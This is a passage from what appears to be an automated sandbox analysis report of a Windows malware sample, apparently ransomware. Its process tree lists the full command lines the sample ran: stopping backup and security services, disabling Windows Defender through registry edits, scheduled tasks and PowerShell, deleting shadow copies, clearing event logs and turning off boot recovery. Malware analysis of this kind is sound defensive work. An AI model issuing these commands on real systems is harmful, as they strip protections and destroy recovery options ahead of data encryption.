400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 104 PID 3208 wrote to memory of 428 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 104 PID 3208 wrote to memory of 756 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 106 PID 3208 wrote to memory of 756 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 106 PID 3208 wrote to memory of 2360 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 108 PID 3208 wrote to memory of 2360 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 108 PID 3208 wrote to memory of 1808 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 110 PID 3208 wrote to memory of 1808 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 110 PID 3208 wrote to memory of 2008 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 112 PID 3208 wrote to memory of 2008 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 112 PID 3208 wrote to memory of 2112 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 114 PID 3208 wrote to memory of 2112 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 114 PID 3208 wrote to memory of 2784 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 116 PID 3208 wrote to memory of 2784 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 116 PID 3208 wrote to memory of 4004 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 118 PID 3208 wrote to memory of 4004 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 118 PID 3208 wrote to memory of 3852 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 120 PID 3208 wrote to memory of 3852 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 120 PID 3208 wrote to memory of 596 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 122 PID 3208 wrote to memory of 596 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 122
Processes
-
C:\Users\Admin\AppData\Local\Temp\400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe"C:\Users\Admin\AppData\Local\Temp\400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3208 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:548 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1344
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1252
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1336 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1576
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:900 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:4008
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3736 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:4048
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:2876
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:676
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1288 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1168
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_13790" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_13790" /y3⤵PID:2448
-
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:3644
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1620
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:948
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1156
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:428
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵PID:756
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:2360
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1808
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_13790" start= disabled2⤵PID:2008
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2112
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:2784
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:4004
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:3852
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:596
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:700
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:2120
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:3080
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:3180
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1624
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:3788
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1180
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1280
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1916
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:2308
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:3500
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:3540
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:2612
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1752
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1844
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:372
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1692
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:2628
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1504
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:2520
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:3496
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:2280
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1548
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1592
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2248
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3720
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3640
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1296
-
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:2948
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3560
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1516
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2244
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:592
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1252
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1496
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1796
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:676
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:376
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:3376
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1164
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:3588
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1536
-
-